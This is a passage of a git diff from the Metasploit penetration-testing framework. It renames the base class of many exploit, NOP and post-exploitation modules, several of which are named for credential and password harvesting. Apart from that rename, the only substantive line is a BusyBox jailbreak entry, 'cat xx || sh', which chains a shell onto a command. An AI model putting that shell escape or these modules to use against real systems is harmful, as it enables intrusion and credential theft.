a/modules/exploits/windows/unicenter/cam_log_security.rb +++ b/modules/exploits/windows/unicenter/cam_log_security.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/vnc/realvnc_client.rb b/modules/exploits/windows/vnc/realvnc_client.rb index a479580f78..822dd251a8 100644 --- a/modules/exploits/windows/vnc/realvnc_client.rb +++ b/modules/exploits/windows/vnc/realvnc_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/vnc/ultravnc_client.rb b/modules/exploits/windows/vnc/ultravnc_client.rb index 4fd21103e0..f024c09371 100644 --- a/modules/exploits/windows/vnc/ultravnc_client.rb +++ b/modules/exploits/windows/vnc/ultravnc_client.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb index 2822427e85..6fa83a3ca9 100644 --- a/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb +++ b/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/vnc/winvnc_http_get.rb b/modules/exploits/windows/vnc/winvnc_http_get.rb index 26bb1236d2..577b1ddc1d 100644 --- a/modules/exploits/windows/vnc/winvnc_http_get.rb +++ b/modules/exploits/windows/vnc/winvnc_http_get.rb @@ -6,7 +6,7 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote + class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/vpn/safenet_ike_11.rb b/modules/exploits/windows/vpn/safenet_ike_11.rb index 24c94599c7..58e589be35 100644 --- a/modules/exploits/windows/vpn/safenet_ike_11.rb +++ b/modules/exploits/windows/vpn/safenet_ike_11.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index 71d8a1c447..d411acf6ea 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::WinRM diff --git a/modules/exploits/windows/wins/ms04_045_wins.rb b/modules/exploits/windows/wins/ms04_045_wins.rb index 4d7028f656..d4c3aea12c 100644 --- a/modules/exploits/windows/wins/ms04_045_wins.rb +++ b/modules/exploits/windows/wins/ms04_045_wins.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/nops/armle/simple.rb b/modules/nops/armle/simple.rb index a2ba2e1f56..ec0d65615b 100644 --- a/modules/nops/armle/simple.rb +++ b/modules/nops/armle/simple.rb @@ -15,7 +15,7 @@ require 'msf/core' # This class implements simple NOP generator for ARM (little endian) # ### -class Metasploit3 < Msf::Nop +class Metasploit < Msf::Nop def initialize diff --git a/modules/nops/php/generic.rb b/modules/nops/php/generic.rb index 0498fd6817..25dfe9a390 100644 --- a/modules/nops/php/generic.rb +++ b/modules/nops/php/generic.rb @@ -12,7 +12,7 @@ require 'msf/core' # This class implements a "nop" generator for PHP payloads # ### -class Metasploit3 < Msf::Nop +class Metasploit < Msf::Nop def initialize super( diff --git a/modules/nops/ppc/simple.rb b/modules/nops/ppc/simple.rb index 73e0f0f4ed..044337caf0 100644 --- a/modules/nops/ppc/simple.rb +++ b/modules/nops/ppc/simple.rb @@ -15,7 +15,7 @@ require 'msf/core' # This class implements simple NOP generator for PowerPC # ### -class Metasploit3 < Msf::Nop +class Metasploit < Msf::Nop def initialize diff --git a/modules/nops/sparc/random.rb b/modules/nops/sparc/random.rb index 6227cf4c38..fe079a61a4 100644 --- a/modules/nops/sparc/random.rb +++ b/modules/nops/sparc/random.rb @@ -15,7 +15,7 @@ require 'msf/core' # This class implements NOP generator for the SPARC platform # ### -class Metasploit3 < Msf::Nop +class Metasploit < Msf::Nop # Nop types InsSethi = 0 diff --git a/modules/nops/tty/generic.rb b/modules/nops/tty/generic.rb index 26f9189a55..08b108615f 100644 --- a/modules/nops/tty/generic.rb +++ b/modules/nops/tty/generic.rb @@ -12,7 +12,7 @@ require 'msf/core' # This class implements a "nop" generator for TTY payloads # ### -class Metasploit3 < Msf::Nop +class Metasploit < Msf::Nop def initialize super( diff --git a/modules/nops/x64/simple.rb b/modules/nops/x64/simple.rb index 765a636309..a8c8440cdd 100644 --- a/modules/nops/x64/simple.rb +++ b/modules/nops/x64/simple.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Nop +class Metasploit < Msf::Nop def initialize super( diff --git a/modules/nops/x86/opty2.rb b/modules/nops/x86/opty2.rb index d45d90434e..391bee954e 100644 --- a/modules/nops/x86/opty2.rb +++ b/modules/nops/x86/opty2.rb @@ -17,7 +17,7 @@ require 'rex/nop/opty2' # ADMmutate and from spoonfu. # ### -class Metasploit3 < Msf::Nop +class Metasploit < Msf::Nop def initialize super( diff --git a/modules/nops/x86/single_byte.rb b/modules/nops/x86/single_byte.rb index 3607aa361f..03f0406d2a 100644 --- a/modules/nops/x86/single_byte.rb +++ b/modules/nops/x86/single_byte.rb @@ -13,7 +13,7 @@ require 'msf/core' # ADMmutate and from spoonfu. # ### -class Metasploit3 < Msf::Nop +class Metasploit < Msf::Nop SINGLE_BYTE_SLED = { diff --git a/modules/post/aix/hashdump.rb b/modules/post/aix/hashdump.rb index dd9de9fc96..94d57e7f9c 100644 --- a/modules/post/aix/hashdump.rb +++ b/modules/post/aix/hashdump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/cisco/gather/enum_cisco.rb b/modules/post/cisco/gather/enum_cisco.rb index 515c7b8595..3aaaa78632 100644 --- a/modules/post/cisco/gather/enum_cisco.rb +++ b/modules/post/cisco/gather/enum_cisco.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/cisco' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Cisco def initialize(info={}) super( update_info( info, diff --git a/modules/post/firefox/gather/cookies.rb b/modules/post/firefox/gather/cookies.rb index 4fc5f6cc6e..35c1cb1e18 100644 --- a/modules/post/firefox/gather/cookies.rb +++ b/modules/post/firefox/gather/cookies.rb @@ -6,7 +6,7 @@ require 'json' require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/post/firefox/gather/history.rb b/modules/post/firefox/gather/history.rb index 932105e952..bf45bb4da2 100644 --- a/modules/post/firefox/gather/history.rb +++ b/modules/post/firefox/gather/history.rb @@ -6,7 +6,7 @@ require 'json' require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/post/firefox/gather/passwords.rb b/modules/post/firefox/gather/passwords.rb index 0009613d36..b0123d3a77 100644 --- a/modules/post/firefox/gather/passwords.rb +++ b/modules/post/firefox/gather/passwords.rb @@ -7,7 +7,7 @@ require 'json' require 'msf/core' require 'msf/core/payload/firefox' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/post/firefox/gather/xss.rb b/modules/post/firefox/gather/xss.rb index dbe1b8a48c..ffa57d3fd9 100644 --- a/modules/post/firefox/gather/xss.rb +++ b/modules/post/firefox/gather/xss.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'json' require 'msf/core/payload/firefox' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/post/firefox/manage/webcam_chat.rb b/modules/post/firefox/manage/webcam_chat.rb index 5e568c8584..d0533dd50f 100644 --- a/modules/post/firefox/manage/webcam_chat.rb +++ b/modules/post/firefox/manage/webcam_chat.rb @@ -6,7 +6,7 @@ require 'json' require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Exploit::Remote::FirefoxPrivilegeEscalation include Msf::Post::WebRTC diff --git a/modules/post/linux/busybox/enum_connections.rb b/modules/post/linux/busybox/enum_connections.rb index 473c55c7de..7ddfa77c69 100644 --- a/modules/post/linux/busybox/enum_connections.rb +++ b/modules/post/linux/busybox/enum_connections.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/enum_hosts.rb b/modules/post/linux/busybox/enum_hosts.rb index 996a6f377f..5fda45d7c7 100644 --- a/modules/post/linux/busybox/enum_hosts.rb +++ b/modules/post/linux/busybox/enum_hosts.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/jailbreak.rb b/modules/post/linux/busybox/jailbreak.rb index 9db686e65a..52b6ffac8b 100644 --- a/modules/post/linux/busybox/jailbreak.rb +++ b/modules/post/linux/busybox/jailbreak.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post METHODS = [ 'cat xx || sh', diff --git a/modules/post/linux/busybox/ping_net.rb b/modules/post/linux/busybox/ping_net.rb index 4e1191304b..f230d4812e 100644 --- a/modules/post/linux/busybox/ping_net.rb +++ b/modules/post/linux/busybox/ping_net.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/busybox/set_dmz.rb b/modules/post/linux/busybox/set_dmz.rb index a2d109cd6b..10cda582f6 100644 --- a/modules/post/linux/busybox/set_dmz.rb +++ b/modules/post/linux/busybox/set_dmz.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize super( diff --git a/modules/post/linux/busybox/set_dns.rb b/modules/post/linux/busybox/set_dns.rb index 7732059d03..cf551abccc 100644 --- a/modules/post/linux/busybox/set_dns.rb +++ b/modules/post/linux/busybox/set_dns.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/smb_share_root.rb b/modules/post/linux/busybox/smb_share_root.rb index f89e57e6c1..f267736184 100644 --- a/modules/post/linux/busybox/smb_share_root.rb +++ b/modules/post/linux/busybox/smb_share_root.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/wget_exec.rb b/modules/post/linux/busybox/wget_exec.rb index 38e90216a0..e7c34be37e 100644 --- a/modules/post/linux/busybox/wget_exec.rb +++ b/modules/post/linux/busybox/wget_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/gather/checkvm.rb b/modules/post/linux/gather/checkvm.rb index c3085a1104..4063b4f325 100644 --- a/modules/post/linux/gather/checkvm.rb +++ b/modules/post/linux/gather/checkvm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/ecryptfs_creds.rb b/modules/post/linux/gather/ecryptfs_creds.rb index 21bbd3f3eb..f01ac412cd 100644 --- a/modules/post/linux/gather/ecryptfs_creds.rb +++ b/modules/post/linux/gather/ecryptfs_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/linux/gather/enum_configs.rb b/modules/post/linux/gather/enum_configs.rb index 8e6ca7cf9d..0e830eef83 100644 --- a/modules/post/linux/gather/enum_configs.rb +++ b/modules/post/linux/gather/enum_configs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_network.rb b/modules/post/linux/gather/enum_network.rb index ba52141294..cf00a3365a 100644 --- a/modules/post/linux/gather/enum_network.rb +++ b/modules/post/linux/gather/enum_network.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/enum_protections.rb b/modules/post/linux/gather/enum_protections.rb index ab18a0c403..93d858e956 100644 --- a/modules/post/linux/gather/enum_protections.rb +++ b/modules/post/linux/gather/enum_protections.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_psk.rb b/modules/post/linux/gather/enum_psk.rb index 9edc2a7ada..979f3214f4 100644 --- a/modules/post/linux/gather/enum_psk.rb +++ b/modules/post/linux/gather/enum_psk.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/enum_system.rb b/modules/post/linux/gather/enum_system.rb index e96331fa98..45dd6edbdb 100644 --- a/modules/post/linux/gather/enum_system.rb +++ b/modules/post/linux/gather/enum_system.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_users_history.rb b/modules/post/linux/gather/enum_users_history.rb index 6feeb24323..3dff27cf51 100644 --- a/modules/post/linux/gather/enum_users_history.rb +++ b/modules/post/linux/gather/enum_users_history.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_xchat.rb b/modules/post/linux/gather/enum_xchat.rb index c6a722884d..04d2712ac9 100644 --- a/modules/post/linux/gather/enum_xchat.rb +++ b/modules/post/linux/gather/enum_xchat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb index ef049898e8..63fa52a1e0 100644 --- a/modules/post/linux/gather/gnome_commander_creds.rb +++ b/modules/post/linux/gather/gnome_commander_creds.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/gather/hashdump.rb b/modules/post/linux/gather/hashdump.rb index eb049ae7da..ffec76a393 100644 --- a/modules/post/linux/gather/hashdump.rb +++ b/modules/post/linux/gather/hashdump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/mount_cifs_creds.rb b/modules/post/linux/gather/mount_cifs_creds.rb index ed33627410..a022c99f60 100644 --- a/modules/post/linux/gather/mount_cifs_creds.rb +++ b/modules/post/linux/gather/mount_cifs_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb index cbdbfb31dd..de268ad000 100644 --- a/modules/post/linux/gather/pptpd_chap_secrets.rb +++ b/modules/post/linux/gather/pptpd_chap_secrets.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/linux/manage/download_exec.rb b/modules/post/linux/manage/download_exec.rb index 5e15132d46..f1462c3dba 100644 --- a/modules/post/linux/manage/download_exec.rb +++ b/modules/post/linux/manage/download_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/multi/escalate/cups_root_file_read.rb b/modules/post/multi/escalate/cups_root_file_read.rb index 578ae8ba22..a6f2261b63 100644 --- a/modules/post/multi/escalate/cups_root_file_read.rb +++ b/modules/post/multi/escalate/cups_root_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File LP_GROUPS = ['lpadmin', '_lpadmin'] diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index ab9535c6c3..15e65f5d57 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/local/linux' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post Rank = ManualRanking include Msf::Post::File diff --git a/modules/post/multi/gather/apple_ios_backup.rb b/modules/post/multi/gather/apple_ios_backup.rb index 31d07e1ba0..b5da8d6a15 100644 --- a/modules/post/multi/gather/apple_ios_backup.rb +++ b/modules/post/multi/gather/apple_ios_backup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/parser/apple_backup_manifestdb' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/check_malware.rb b/modules/post/multi/gather/check_malware.rb index 8a2104215d..094a654f40 100644 --- a/modules/post/multi/gather/check_malware.rb +++ b/modules/post/multi/gather/check_malware.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/http' require 'uri' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 8c07940817..4a6f91093a 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -8,7 +8,7 @@ require 'msf/core/auxiliary/report' require 'openssl' require 'digest/md5' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/dns_bruteforce.rb b/modules/post/multi/gather/dns_bruteforce.rb index 3c987cc114..bb8d75595b 100644 --- a/modules/post/multi/gather/dns_bruteforce.rb +++ b/modules/post/multi/gather/dns_bruteforce.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/dns_reverse_lookup.rb b/modules/post/multi/gather/dns_reverse_lookup.rb index 8e562b4db8..04f0132e9d 100644 --- a/modules/post/multi/gather/dns_reverse_lookup.rb +++ b/modules/post/multi/gather/dns_reverse_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/dns_srv_lookup.rb b/modules/post/multi/gather/dns_srv_lookup.rb index 3ae16da37f..e5eb796597 100644 --- a/modules/post/multi/gather/dns_srv_lookup.rb +++ b/modules/post/multi/gather/dns_srv_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/multi/gather/enum_vbox.rb b/modules/post/multi/gather/enum_vbox.rb index 283ffbfa7b..0c0a0a9a9c 100644 --- a/modules/post/multi/gather/enum_vbox.rb +++ b/modules/post/multi/gather/enum_vbox.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'yaml' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/env.rb b/modules/post/multi/gather/env.rb index 34938cb19b..8cdfa5a690 100644 --- a/modules/post/multi/gather/env.rb +++ b/modules/post/multi/gather/env.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/multi/gather/fetchmailrc_creds.rb b/modules/post/multi/gather/fetchmailrc_creds.rb index 9b9de9aff2..000783bfea 100644 --- a/modules/post/multi/gather/fetchmailrc_creds.rb +++ b/modules/post/multi/gather/fetchmailrc_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/filezilla_client_cred.rb b/modules/post/multi/gather/filezilla_client_cred.rb index 736c4b9fc3..84517d3f32 100644 --- a/modules/post/multi/gather/filezilla_client_cred.rb +++ b/modules/post/multi/gather/filezilla_client_cred.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/find_vmx.rb b/modules/post/multi/gather/find_vmx.rb index eb16f3e85b..ce466b99f9 100644 --- a/modules/post/multi/gather/find_vmx.rb +++ b/modules/post/multi/gather/find_vmx.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'yaml' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/firefox_creds.rb b/modules/post/multi/gather/firefox_creds.rb index fde3b370a8..e268bc9e8e 100644 --- a/modules/post/multi/gather/firefox_creds.rb +++ b/modules/post/multi/gather/firefox_creds.rb @@ -21,7 +21,7 @@ require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/gpg_creds.rb b/modules/post/multi/gather/gpg_creds.rb index 6c296d9118..c882b093eb 100644 --- a/modules/post/multi/gather/gpg_creds.rb +++ b/modules/post/multi/gather/gpg_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index c2b7ebaaaf..9524539e7f 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -8,7 +8,7 @@ require 'sqlite3' require 'uri' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles include Msf::Post::OSX::System diff --git a/modules/post/multi/gather/multi_command.rb b/modules/post/multi/gather/multi_command.rb index c16ef69a6c..82b2bbd8f5 100644 --- a/modules/post/multi/gather/multi_command.rb +++ b/modules/post/multi/gather/multi_command.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/netrc_creds.rb b/modules/post/multi/gather/netrc_creds.rb index 4bd3f3e381..69804d0a32 100644 --- a/modules/post/multi/gather/netrc_creds.rb +++ b/modules/post/multi/gather/netrc_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/pgpass_creds.rb b/modules/post/multi/gather/pgpass_creds.rb index 09c3450e84..305aedb37d 100644 --- a/modules/post/multi/gather/pgpass_creds.rb +++ b/modules/post/multi/gather/pgpass_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/pidgin_cred.rb b/modules/post/multi/gather/pidgin_cred.rb index 437ea9b73a..90d3124905 100644 --- a/modules/post/multi/gather/pidgin_cred.rb +++ b/modules/post/multi/gather/pidgin_cred.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/ping_sweep.rb b/modules/post/multi/gather/ping_sweep.rb index 1c76b839a8..d5afa3f63e 100644 --- a/modules/post/multi/gather/ping_sweep.rb +++ b/modules/post/multi/gather/ping_sweep.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/remmina_creds.rb b/modules/post/multi/gather/remmina_creds.rb index a7f9b7ff42..9da909e0ca 100644 --- a/modules/post/multi/gather/remmina_creds.rb +++ b/modules/post/multi/gather/remmina_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/resolve_hosts.rb b/modules/post/multi/gather/resolve_hosts.rb index a5ccaa1a6c..55dbcc190b 100644 --- a/modules/post/multi/gather/resolve_hosts.rb +++ b/modules/post/multi/gather/resolve_hosts.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/rsyncd_creds.rb b/modules/post/multi/gather/rsyncd_creds.rb index ee0736848e..4552237dd5 100644 --- a/modules/post/multi/gather/rsyncd_creds.rb +++ b/modules/post/multi/gather/rsyncd_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/run_console_rc_file.rb b/modules/post/multi/gather/run_console_rc_file.rb index 771391e748..867fe52a15 100644 --- a/modules/post/multi/gather/run_console_rc_file.rb +++ b/modules/post/multi/gather/run_console_rc_file.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post diff --git a/modules/post/multi/gather/skype_enum.rb b/modules/post/multi/gather/skype_enum.rb index b07ccd6090..f94b0b59b6 100644 --- a/modules/post/multi/gather/skype_enum.rb +++ b/modules/post/multi/gather/skype_enum.rb @@ -11,7 +11,7 @@ require 'csv' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/ssh_creds.rb b/modules/post/multi/gather/ssh_creds.rb index b5746e929e..2bceac5c25 100644 --- a/modules/post/multi/gather/ssh_creds.rb +++ b/modules/post/multi/gather/ssh_creds.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'sshkey' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/thunderbird_creds.rb b/modules/post/multi/gather/thunderbird_creds.rb index bcda33c4ac..1df50b7234 100644 --- a/modules/post/multi/gather/thunderbird_creds.rb +++ b/modules/post/multi/gather/thunderbird_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/wlan_geolocate.rb b/modules/post/multi/gather/wlan_geolocate.rb index cdb498623a..082b72948d 100644 --- a/modules/post/multi/gather/wlan_geolocate.rb +++ b/modules/post/multi/gather/wlan_geolocate.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rex/google/geolocation' -class Metasploit3 < Msf::Post +class Metasploit < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/general/close.rb b/modules/post/multi/general/close.rb index 443f40d0b0..c8ae75ef22 100644 --- a/modules/post/multi/general/close.rb +++ b/modules/post/multi/general/close.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class 